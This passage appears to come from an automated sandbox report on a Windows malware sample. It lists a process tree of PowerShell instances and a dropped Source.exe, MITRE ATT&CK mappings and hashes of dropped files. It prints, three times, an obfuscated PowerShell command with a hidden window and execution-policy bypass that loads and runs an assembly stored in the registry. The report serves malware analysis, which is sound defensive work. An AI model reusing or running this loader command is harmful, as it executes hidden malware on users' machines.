  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2704
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5012
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2444
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4280
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:5360
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3004
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3512
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1044
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5520
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6096
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6108
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5600
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4892
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3312
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5084

C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1576
- C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  2⤵
  - Executes dropped EXE
  PID:4004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:5156
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3632
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3156
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4580
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5344
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5600
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5476
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3700
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1020
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2732
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5592

C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5384
- C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  2⤵
  - Executes dropped EXE
  PID:3884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:4340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
198KB

MD5
cda68ffa26095220a82ae0a7eaea5f57

SHA1
e892d887688790ddd8f0594607b539fc6baa9e40

SHA256
f9db7dd5930be2a5c8b4f545a361d51ed9c38e56bd3957650a3f8dbdf9c547fb

SHA512
84c8b0a4f78d8f3797dedf13e833280e6b968b7aeb2c5479211f1ff0b0ba8d3c12e8ab71a89ed128387818e05e335e8b9280a49f1dc775bd090a6114644aaf62

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\3085f3ee-ce14-4e19-a6ee-90d74f0ca927.tmp

Filesize
1KB

MD5
4383afbf68bff0bcb75592bf9edc1686

SHA1
6ef1f1c194c0ff6cb79fd2c792bb332208558dd7

SHA256
ba35fcaa7b1e0a7d534de65bf6d589fb60f6e18c78f9a3820f0e50646d6a3b2b

SHA512
a99fd983e70843f49dab5a7409d9dcea19034feefdbedaab7f4aa2be314990606a7e6aa5f918819fb4d9fd7e1f5a9f8cac6209e426ab5d49960a1cb2fb8c55a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
2b7fe313e42299a307374e5825a0f0e9

SHA1
282b598fda845366554d94ccf66b5a892259309b

SHA256
fb05a7db6aa4a637378500f0f37ca904d1f73db698bab01814a72cb867692213

SHA512
b273107cb81e01b1d8f3f14d265dca1aad0ae1d7057d70fa75c7199ddc2b64c58f0aeefedb8f094170a4e6ae1996ffa9d22c0abcf87513e4e2eed4261ebc0d65

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
80133757246090e262520a46a06ef493

SHA1
ddeee156d5bbf78aaec903ed747202e11829eaba

SHA256
e8aaf3d5505c33873c7950692ec8ca435861c2bf28bff7ddfbbb2af4b41fb42d

SHA512
cd382c1d457b13dc13027049e715fd5e22389a7e09e2fcfc97fe49434a97e3a6ca4685a340114601247fa65c8b4e6fe3de44e6b344e5b5189dac8396f26676cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
a9eefb03d8d35025a7362722425b6064

SHA1
33275551f11dffefde275d4e3cf43d25d896597a

SHA256
999ff59d45d7f1688dc6a84a833dee233437d2d71108d8f4b8f8ef558a01f573

SHA512
493913c908cc9331e66723be822b8315d23489dc68230af6b9c5ba742c5005cd305359f1f4fa1195528ae33469ef18e6390e9a1f35f78e844863fdb98dc5123c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
02d217acd0fcdb3141d1800b07ada9ea

SHA1
96cc8451671a0210a121ed7cc43ec53f57f4198f

SHA256
606a792859ceb16aaec0fa16eb8ab74a7144f5df2acb5d1a851b90d81cfae64a

SHA512
d215e6539c681df28208f06f548608d65cd2836c1930d061c3e75b52ad7f50b02ec7d067c01a1551e11a506e50c1260bab0ef6fd13184b16167acffb9229c88f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
b45ac77a39e97c8fb2356028125a15bb

SHA1
4f7e9a861c323752424afa048dafa298232fbefa

SHA256
9b3893e68854613baaeed9d62d660f51893d6d49b10da17aadbb6d273bfbe272

SHA512
91b5ba27e0d07047d08429f4da41a2d3f2197925333c64cdd40efd8fbd83735449018c6b4e6af692f573659f84f265daa9749d1909b78c64568584498708ee36

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
28d6e322c1b8df92b7dfe6e9762b363b

SHA1
8525be0033e17aeb0bafb7a9ca12d31849994f7f

SHA256
602cad3e651fa57135e79806c3e4c22a4f48742f8a826d5f7cb5e5c8f261715e

SHA512
6f118c4f6e949f0bd8e240d14b4b7efb6427e56db7c8407ddb8104340505c92fbfa05a447d422eea040b66d946b98a9360ac8cef4c054173864811c5141b031c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
ca3906db67f4a6c8e3a007b5528a89a8

SHA1
dc2d292bcf055b335bec757c4d5fcc4dd5969785

SHA256
15dcc9b076420bc95c21822f5539bad8cd1a293b03187bb454373a689decdc5d

SHA512
90ce4e3981cd8302a782e5dd1075ca2200796ea5e513f09c1568f228350283b338380d210f770902ab4ef2ff565f6e33f8cb5f878cb22b70db7746e3aa0e23b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
333ae4e5d95fd6b65b5e6ad0ae9717f5

SHA1
c96d1af1b3974aae18880d9f588f076b8f8c1597

SHA256
c1b878b556d01d2dd247243cbb303e12b344e1d6be4615810d36a0c8db994630

SHA512
3c51eea97b188e2b42d28846246bffb51b59c7d3b111f7ef61a394ea28514447cf548320ee5d0f3c0923f88997d3d07e7b063be8ee9de7391a70bdf81f975c54

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
944074c219357b430481031137014e1f

SHA1
63dd4b7c5298911d870478b6da773d2157f402c2

SHA256
1575f6a6003084f6c14d5537b023f3d11c2a3928a23cd733c9ac94dcb754e214

SHA512
867fadc79e11fefbae27fafcebe9a33f4505edecc7d3d768fa6d61b2020da3b0b165eb9a5bcad0d9f63a79f50e78f07bdc9308ba733eac1526c8061e35000483

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
ee336b2a06c2268f8beb401e65627b71

SHA1
ee3e336a160101a0c24001b549aa0d2fb32cf9b2

SHA256
1d8c4da20f1a9d6940e16a814ac2418b093d75875626d8977b4e1fd559e43608

SHA512
a8fd9947b9b30d1d18cbdc90ddd4b70927e951651b88f3bbbf2248000e9ff32b84e35da603e837ea98969d98da0abe1f2cb15172b2b677e7af93c49b024c5243

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
7d527288cb730d80fe0922e2edeccf44

SHA1
10f24d446c7fae325529fc9ff90072da2fa0cfeb

SHA256
be8ce82bd43c583f53ca3202c79ec7a21467c08927f0252437d9bc9476877a3d

SHA512
78a0f0dc30bc7051c86d3f7b78b1f113d03d54c96a678cf18e968861d94d40f105d75676ad63565d7e3a89d11a3680f495b4d1799f98bc9e9ca603cc6c800c11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
9575eb4e3ebf567db85e3e1a4af03b5c

SHA1
dce0c46a98de40a24db1c770ed82b5ab907505dd

SHA256
cf78100f2e2864b9baa72fbd67144d4bb71160f229fd9ec1e16de4dd431c0300

SHA512
cc422c09518cb03a35a37b9919e0f8b142759399f36ae7ce74eda55d5fc856f8b04072a448ef9256b5af39753d869f8c3a1f079a8cfb539b85e2922b696bfcdf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
3d26415a4f4a9ef0dfbf70201ec71755

SHA1
6aa2a150a01ec3ca9803627aef0a12c26dbba491

SHA256
25fa4d24ab94a1abf2f1b942a1666d7fc557cc49577ef3406af8df621375cb79

SHA512
465ba5df7e3b35c36e8c0c25e5893801c946466dd2d56990146b0d123bb2b2a387fa21eb6584464d207bb510ef8606d03679d890ada239a4bb76a6ca3d41ca49

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
2d811f9fddee8c87948564d4fabddae0

SHA1
b34c0ce3a3462ac8d9ad2fc586d2a3e4fe31457b

SHA256
48e050db11227531092342f13e4e635a6c510aa36c40ebcf3babfdd17fc1fe61

SHA512
e33f21eb605f3b3734734b78fb2c7164c298e5cde6f65c24a21794a490caca4e466066bc4c25ade822b0c69ffb043ad0e0e84b860418e709b0f0a49e3ab97314

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
f6932bc62effec6c29533e692b63be60

SHA1
117ad3fd380f22f38b99fee4ae141a98478807ae

SHA256
3575911972c6fffdace76b0ddfba34c6c4bae8ca61315bfc2ef1df4d608162e6

SHA512
32ad7167339cdde84cd475bef1a1cace929f6940a4293dccc0c2954d43f5d21785a37a4afb00fdbfbe796d605370f3914b2d21c39a093c823afee410957efb5b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
34298cc0dbeb36fb9efa71abbad0f864

SHA1
066f080d9b8377bc6ca3dd119968bf34b2e184b9

SHA256
4c81bcacb5ce88f64e3fe19c3dd76a4aa2d8376b05fc442c675b0ee4e9843372

SHA512
42e795ace3598fae866696a661c8763dad12d68a80e58949645fb0eb7777f6650d854faf3cd73fcc8676ac39cf6bf14b19318627ba9cd9d75c6bc0387052b1d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
93c191c7ad2873cc2d51e52a8c912880

SHA1
9044d7ee14c56cabcb04acf09d2f85951ee544b7

SHA256
6e9c8b19adabf068433442f630415e7988ad0a85196936d5443238931d081199

SHA512
6d57fcf4ba3f66cc851aaeb4ea9582e5433a75046836df8586c60d3ed2b6bfb2f61dbec2ef61185c5577a2fe818005b774d1c605b8414d87f735125d1d42f5e1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
46b9d3c3f97ba4e7f0109f6c73fbd7cc

SHA1
be337734f203a81c5a33f2b349fdbc221fbd5256

SHA256
7542044db96ad447a91c2883043c2ab0033f41f13268dc902b3285b6c7aa87e8

SHA512
ba1a0f8fd7ecbc82d9fb11942c026d28072f6dd3d28e091ad76964f98fa2f284961d2c1d5b065c910ce9013458c538b8e4622de450b199ccca2586610f4c2da1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
0d7359c35f71874bf936854608febfc5

SHA1
dba129489426460eb3c495a0df177b7b2373ef61

SHA256
c3a70516fae5a3354f67e529eaf2dd70212999efcf5e667404269e0ab34046ab

SHA512
e8840176c3b870f1424bf66ad44bc6af9af6f11d3a24fec442bf1cbf57935038f9df745606442a9c3d4283ef0b959452f3184563c153bcfe48db85f5da7be99e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
b610bb2b0a31c1a03d2d87c4eebf4f1d

SHA1
42828a40d429c67fa85e43f04bf47d4072129a49

SHA256
b0cdfc4b93e5b76a794de40f479542025c42f086d40fb7496930013c68577894

SHA512
de9316397c96da5897183b16f8a453033da63e030da3b4b2548d5285b63301c3e5667673cd0ee962b2fde9903751d1e34e7947bb188780cbc10c106107f2bd69

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
e70c373ae2670fb3217cd430625e1d7a

SHA1
5515b7f297d3c79c98c0bbfca86390172003bb6b

SHA256
9284c9f9deb3aec8653627cc5bd11ad0bc3039f3cfa13e12266bf23ec64d98e9

SHA512
4834099f2291b34829193c568281007477996c48f847124cd8f07d2ee0fa2d483d6b253f991259346e20e2cd7785dc07f898ad896682dff7d0629c8970bcffa7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
67b5b5c2965d2f205574efcb5c71aa4e

SHA1
98cef1cad4e1a9cbdcfc75d77c0bcb21923e63d2

SHA256
b6b9ea182d191f26c5c22635c1eaea9f163d1be6f10c8599c869afb90798065d

SHA512
bce25e02be955f29ba95fed6bc5c391ff6bde0a2d1b85fff141716e0708320fc7c68d975bfbcd8dc22a7f3d4315f328bd1b7013f6e6ce1c5e1b24ffa43d718e0

Download Submit
C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe

Filesize
1.1MB

MD5
5da2b49ff04006a58094580a784c1bdf

SHA1
946892bea1ef2156364d891653abdc9c99de6b28

SHA256
2223e397362305b93540aa522a0e1ce5cac40ca9086528b9d4bfd742dd5d3f33

SHA512
38660b778cbe132646dc8f7abf94e44161afa78e20deb3a7f8bb28ef12f9b9721225e6c287528e189494c62a674a7366a80dce729f49714436faf07dc64e882e

Download Submit
C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe

Filesize
768KB

MD5
2a55917b968d1bf22b780c2ffda913ca

SHA1
20bd2cc8301a9c914f394648d0962a081e74158a

SHA256
05f7b61c0e1bfffe4b19bf71725e70d7ba97475612fa788e676c6fb7c8bdf7c8

SHA512
0c388c09972f7a1ab88888be6ebd6b23cc478a2bc266859739c7fd0d581ca99ea04d8a0cd9b47184ff8a7a3ce1b629592459cc6d8a7599dd8cb7bc2ebe8316fd

Download Submit
C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe

Filesize
512KB

MD5
9412e1676b2efd70777fea0c0b386b7e

SHA1
f457a9508ac19613683484da5cb79f0b18877b81

SHA256
91cc1e26e7750f35cd85b799cc91cc10b82e70e24d72e953219393b6a4a88901

SHA512
4269e598f5366fb5e005ddab33a1f689257d6c383053c58148b782ebedd3f9a6ef02159cfe7bafc6817bd57583fbe3f275e77f40bb935f1ae9c4d059252d687f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe.log

Filesize
1KB

MD5
6766a7cc8b7039bf7f32b9e4a63b7f4d

SHA1
8eb95e170a3dc512589a12ec936989d7d3bb86e4

SHA256
14c0bf2c6febb71441fe2b1a04934a00d49aeee1bf2d9f21452cba57ade2fd0a

SHA512
636e1091399f101f8494936489fb605ae91d542639b4704d5f541a64dffb320960c676c730bca2a835ab70c9feed517b87efa9390f7cb06c73fde50d7a75d331

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hyhueiwl.exe.log

Filesize
1KB

MD5
5b952be81fc4c5ec0923a6f9255d1a21

SHA1
b98dc707be1fed30fd29b33cda62de3d56b9f41b

SHA256
7b3211af083a6e74f8e2375ea831119e5b5f0afa4668a1cf510e228a133acd15

SHA512
418cbb5f9de9d7d3f077b2ae9feb7fee4b231ee97f11660db8a14db777c7a6df1e66c0db933dd566284fa50bd14de4c2fd0b850c155ef15438b7eecba3fa5c98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
825c3fa36a3e98696e3810ea68db12a8

SHA1
a6d15d37ab2ced8c4a322320bdb5921bd24b6245

SHA256
8e8d1249329ef9e8ad39c362f0c03a00599d1b7d1abe72dd46cb6f2942a03859

SHA512
11238b2faa6217b30404d7649fb391860add52a862330787d09077b07a6a3ac64969025a7435a6399b3f19598d1dcaba01216e70c39eba6ddc7fbee1454add56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
76b52ccdb5682f80e9830a765e4f9604

SHA1
e0f063114a8463b5a6f44858738a7ffdc2fe9061

SHA256
2428d24df851b6e7b5cfa7a1d76e19e0f853ae0f63d95675d1e6d2f73685ee7e

SHA512
af544fcaf4702a619aeaa1534069fcfd82afd74402d6a58318ebd949ee47d55fc0043aa87a499864174e5cda1b47bd0ba0f90d441f974de1c50840b21a8fefad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
2a4dcdff9cdd4dbce314d828b326c50c

SHA1
70c54a5390830ca7a726dbfb1fe18553f1dba976

SHA256
99cf9ca4d3104f68e971ddcc269e1f22e1b3e4ede410a6e084b033a38a66fdc0

SHA512
0c1b1f64f3cf65adc1e2587d3d22ffe4303b2acc48d575d6af236181059e94d22216aff9789ebecb19646042a1c9174c90d118f439835d2e235021f2b36cc773

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
9aa3471cc81f13976757278cdcbe51e0

SHA1
61b666195661ecb44a7ad870939ee299f96a72ff

SHA256
7fb82f748b6b445704fde367f902b5dc638da389d8017260c65ede366dcaa50d

SHA512
28dce8d3dccde07ae78aeb2e6714e0f262197b6440605d5983fa26022f356f272afb084726ff0b3053bdc9babd8d42333bc90e8d25b86c68bd5b58496eac3f13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
6e4e596da8fc365664b8054e593e5f24

SHA1
aac7777e558a1c3aa66d97e01bd2b03710f035a0

SHA256
d4880e6f4b2b5f6862b22b962b045a729bcc7986cd37ea284c4a55ee3b3dd060

SHA512
fb47ba4223424eefe81de9ea36fd72d46a3bd53af370d2b9be03ab81c2121ec77174a4f24b2428a48a9a8d1a78779b8df1607d522aa9db93d1a9cb0b56da106a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
8d5e11e7366e3e30b64db6a095aed049

SHA1
7b702d8140e2684d1bf31281785ee61ff2c180ba

SHA256
920378d885609993da065cc2ffca230c2006b71de17a2c204cf2eb549b7585c2

SHA512
aaf61f7ef2fdba3e21ef0c8706b08b2a24611097019ca32f33f6135e1e64ef6aa1822d54af9826f4bd3fa996c71840c4053acb2af8928d128d5718f10590df92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
0bf5d6e6d2f8db3db18a0077eb0976ef

SHA1
bc1d1cda0ead17be12a82225049f998ae5e32312

SHA256
f845138e9a840846d0ef9f72fe46434da56d83da91a188432ee5a50cfde1e700

SHA512
6f878acf2ff9b47ba415560f85d9a2aebac6e9ca416abcfa69241ab4066cb5a7332c63b42adf76e1263e35e2a425ec19df931180fcaf50cd169fcf976e936355

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
d07d599055d9a993fc6b0347cb06d0c6

SHA1
d1fa6aca750996926c8ae6014421410b6e2d1e84

SHA256
85375c760641cc8a364ee63fa8d3cbc2cf355cc720858b40de473afe4facfe6c

SHA512
cb60590db0f8bb5a467f92d8541dcf5c5477d5d14e444c50763ed3d794c5a39f9169e0e5a95b435ba5b5187430621827c8bf1f2bbaa07794d5f88dfc3ed0d5ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
4946772a1716fe606da346b20afd97f0

SHA1
fe5575a2293ceb7798b8f821349c385433c469ec

SHA256
463b133bd0b3e76079580f66f78794f8b57b6d5ed91c903ee6b308bfc1df4ba7

SHA512
49abe8bbd778b4b673a6b528d182a0d1ae43dbfcf07688961fc3bc144cad7c3012170ef22d71c5fe7f62ea9ddafa11e2b58d5475f88ed377b413fe760013701a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
0da982c1baa9c496cd7db066bdf1210c

SHA1
642282d830b0a0933813084f7ee7a5fcd3df91aa

SHA256
35dba23b2f85aa310ac5a1393f98afccb41aa9da04dca1d5ae5e9dead3148f97

SHA512
981fa5ac8d9c41fa2cc7f62354874e1f732ef90d859c33d26976f237639a68e1fd792bfb4484ab3b478ff6150c43e76a35c3e865667cc74c6dd4a9c3b09fe5e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
343101241e5989f522bfc693ede60bf6

SHA1
d0f21581bedc3a05a11fbe45ec1aa0af6ebba431

SHA256
cc67a7e62ef2bd081e894e08922b24217e43140acba8de27385cad0006dc5310

SHA512
9bcacb8bc862527fed34f7c6896a2dca3a95c184be7d217fbb28f343b551d5dea323113438f970dd611cbeb9f910bdc42d9e3228f9a7c4d880432eef83a56e66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
279801e6470712e3a1820d46ee7af00d

SHA1
7db3de2416412ae0cb62f5caf752bba53de3444f

SHA256
417b9f8a2de3598ce3415b19552b1f89ea4eac7d6b86c3e256e775bc28554f02

SHA512
0a3b1a99b2647ebda6644fad055ca4651c5180b142ba88b178ee5d20be7a007c21e4ed8415858e775788ca63520c55f4b19be4bed7472df5aaff5c25d547ea9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
